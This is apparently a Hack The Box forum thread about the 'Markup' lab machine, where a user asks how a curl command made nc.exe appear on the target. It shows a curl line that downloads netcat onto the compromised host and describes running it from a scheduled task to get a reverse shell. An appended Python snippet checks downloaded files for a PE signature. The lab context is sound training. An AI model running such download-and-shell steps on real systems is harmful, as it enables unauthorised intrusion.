Machine: Markup (Starting point) NC.exe has appeared from nowhere how can this be?

Hey forum, clearly I am missing something here. Working through markup and almost rooted it. Next I need to run this:

curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe

Before doing so, I check the c:\users\daniel folder to see what's there. There is no nc.exe.

I also searched the filesystem before running the command for nc.exe. Nothing.

Then after running the curl command, nc.exe has appeared in the folder. Where did it come from?

Comments

  • And also on this machine how long does one have to wait for the scheduled task to run this?

  • Not only you do the box, many others do; maybe another player added that nc.exe

    Ja4V8s28Ck
    Nothing is an Accident, It's Just a part of Destiny

  • edited April 2020

    I have just run the command again and pointed the output to a different folder and sure enough it creates nc.exe in there. I have no doubt that this command is creating nc.exe.

    My question is, where is it getting it from?

  • curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe is outputting the result of the cURL command:
    -o, --output <file> Write to file instead of stdout

  • edited April 2020

    Something isn't making sense here. This is the output of the command:

    % Total % Received % Xferd Average Speed Time Time Time Current
    100 1056 0 1056 0 0 1056 0 --:--:-- --:--:-- --:--:-- 11234

    It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and it's 1056 bytes.

    If the nc.exe file is just the output of the curl, how can it run? It must be getting the binary for nc.exe from somewhere?

    The next step in the walkthrough is to execute this file as part of a scheduled service to receive a reverse shell.

  • edited April 2020

    @NeoCortex2000 said:
    It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and it's 1056 bytes.

    From here (the first parameter you're passing in to the curl program):

    10.10.10.49/nc.exe

    Notice that ends with nc.exe? You're telling the curl program to download nc.exe from the machine at 10.10.10.49 and output it in C:\Users\Daniel.

    Now I've not looked at this particular machine you're doing and it does seem weird that the machine already has nc.exe on a web server on it, but perhaps that was part of a previous step where you put it there or something. It would make more sense to me if that IP was the IP of your own machine and you had nc.exe on your own web server, but it looks like the IP of a HTB target machine rather than a client machine.

  • Thanks for taking the time to look into this... It didn't seem right to me that I was copying nc.exe into the server from the server that I was on. I couldn't get it to work so I just SCP'd NC.exe from my local machine and it connected right away.

    But good to know that this command would have copied it from my webserver had I been running it and hosting the file.
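
Added example, not part of the thread: curl -o saves whatever body the server sends back, so a file named nc.exe is only a Windows executable if its bytes say so. The sketch below checks a downloaded file for the PE signature; the function names and both sample byte strings are constructed for illustration, and the thread does not say what the 1056 bytes actually contained.

```python
import struct


def classify_download(data: bytes) -> str:
    """Return 'pe', 'html' or 'unknown' for the bytes curl wrote to disk."""
    # A PE file starts with the DOS magic "MZ"; the 4-byte little-endian
    # field at offset 0x3C (e_lfanew) points to the "PE\0\0" signature.
    if len(data) >= 0x40 and data[:2] == b"MZ":
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    # Web servers commonly answer a missing path with an HTML error page,
    # and curl without --fail writes that page to the -o file all the same.
    head = data[:512].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return "html"
    return "unknown"


def make_pe_stub() -> bytes:
    """Constructed sample: just enough header to carry both signatures."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    return bytes(dos) + b"PE\x00\x00" + bytes(20)


# Constructed sample: a generic error body, not captured from any target.
ERROR_PAGE = (
    b"<!DOCTYPE html>\n<html><head><title>404 Not Found</title></head>"
    b"<body><h1>Not Found</h1></body></html>\n"
)

if __name__ == "__main__":
    for name, blob in [("pe stub", make_pe_stub()), ("error page", ERROR_PAGE)]:
        print(f"{name}: {len(blob)} bytes -> {classify_download(blob)}")
```

Reading the real file with `open(path, "rb").read()` and passing it to `classify_download` gives the same answer for an actual download.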
